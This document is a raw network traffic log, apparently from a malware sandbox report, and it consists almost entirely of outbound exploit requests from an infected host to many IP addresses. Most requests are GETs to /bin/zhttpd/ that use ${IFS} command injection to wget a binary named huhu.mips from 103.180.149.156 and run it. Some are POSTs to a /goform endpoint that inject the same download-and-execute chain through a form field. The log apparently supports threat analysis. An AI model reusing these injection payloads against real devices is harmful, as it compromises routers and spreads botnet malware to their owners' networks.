                                                      Feb 2, 2024 06:35:43.428685904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2152192.168.2.1456784168.200.98.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428716898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2153192.168.2.144667095.148.45.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428788900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2154192.168.2.145805485.244.149.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428827047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2155192.168.2.145020275.70.182.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428875923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2156192.168.2.1451720181.19.31.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428931952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2157192.168.2.1453812164.98.134.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428951979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2158192.168.2.1445890167.138.201.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428997040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2159192.168.2.1459364220.75.174.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429044008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2160192.168.2.1443058154.55.46.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429097891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2161192.168.2.143395259.236.183.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429141998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2162192.168.2.1438108186.70.174.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429167986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2163192.168.2.145832624.29.205.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429233074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2164192.168.2.14472868.3.63.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429261923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2165192.168.2.1441966121.117.248.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.429308891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2166192.168.2.1451506206.39.230.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.430316925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2167192.168.2.143417063.60.50.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433058977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2168192.168.2.144667058.235.43.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433092117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2169192.168.2.144848689.211.18.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433126926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2170192.168.2.1456886109.62.35.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433176041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2171192.168.2.145978857.233.198.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433222055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2172192.168.2.1439012123.19.175.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433269978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2173192.168.2.1438064162.6.234.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.433306932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2174192.168.2.1444432163.49.130.1268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.503942013 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2175192.168.2.143632231.221.39.1788080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.697022915 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2176192.168.2.143463672.167.32.1058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.987164021 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:44.129802942 CET197INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html;charset=iso-8859-1
                                                      Content-Length: 50
                                                      Connection: close
                                                      Server: Jetty(10.0.18)
                                                      Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 4e 6f 20 48 6f 73 74 3c 2f 70 72 65 3e
                                                      Data Ascii: <h1>Bad Message 400</h1><pre>reason: No Host</pre>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2177192.168.2.1441172104.228.120.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.441752911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2178192.168.2.1457180187.204.60.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.441797972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2179192.168.2.1447124157.149.161.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.441843987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2180192.168.2.1435162177.216.18.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.441874027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2181192.168.2.1448020206.47.199.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.441909075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2182192.168.2.14584384.115.186.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442011118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2183192.168.2.1452014198.178.112.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442019939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2184192.168.2.143509438.116.88.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442039013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2185192.168.2.143805424.76.99.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442085981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2186192.168.2.1448216129.157.227.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442106009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2187192.168.2.1434480183.32.184.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442156076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2188192.168.2.144502654.104.202.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442205906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2189192.168.2.145863691.157.202.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442248106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2190192.168.2.1449022220.228.59.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442291021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2191192.168.2.1434808189.132.132.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442323923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2192192.168.2.1442938199.244.184.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442353010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2193192.168.2.1450878210.41.77.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442426920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2194192.168.2.1450208168.246.245.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442466974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2195192.168.2.144023234.154.84.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442500114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2196192.168.2.143708461.184.43.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442553043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2197192.168.2.1450592145.223.115.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442588091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2198192.168.2.145421014.192.240.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442641020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2199192.168.2.1444422199.143.214.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442718029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2200192.168.2.1457830154.145.96.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442744017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2201192.168.2.1435958185.19.115.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442747116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2202192.168.2.1440074102.127.123.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442789078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2203192.168.2.1444832100.137.162.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442847013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2204192.168.2.143687448.121.107.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442874908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2205192.168.2.1455674186.197.183.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442945957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2206192.168.2.143920652.38.76.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442953110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2207192.168.2.143700669.220.184.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.442995071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


